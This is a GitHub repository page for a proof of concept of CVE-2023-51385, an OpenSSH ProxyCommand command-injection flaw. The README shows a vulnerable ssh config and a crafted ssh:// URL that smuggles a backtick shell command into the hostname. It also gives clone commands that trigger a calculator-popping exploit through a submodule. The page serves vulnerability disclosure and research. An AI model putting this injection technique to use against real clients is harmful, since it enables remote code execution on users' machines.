Skip to content

vin01/poc-proxycommand-vulnerable

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
cves @ 293669c
cves @ 293669c
 
 
.gitmodules
.gitmodules
 
 
Readme.md
Readme.md
 
 

Repository files navigation

RCE via insecure ~/.ssh/config

Use of tokens like %h, %p in ProxyCommand is quite popular to use tunnels and connection proxying using SSH.

Vulnerable config

host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:

url = ssh://'`open -aCalculator`'foo.example.com/bar

Taken from: https://man.openbsd.org/ssh_config#ProxyCommand

What is in this repository

A submodule which would exploit this vulnerability to pop a calculator on OSX.

Try it out using:

git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules

or

git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules

About

Proof of conept to exploit vulnerable proxycommand configurations on ssh clients (CVE-2023-51385)

vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Resources

Readme
Activity

Stars

47 stars

Watchers

1 watching

Forks

36 forks
Report repository

Releases

No releases published

Packages

No packages published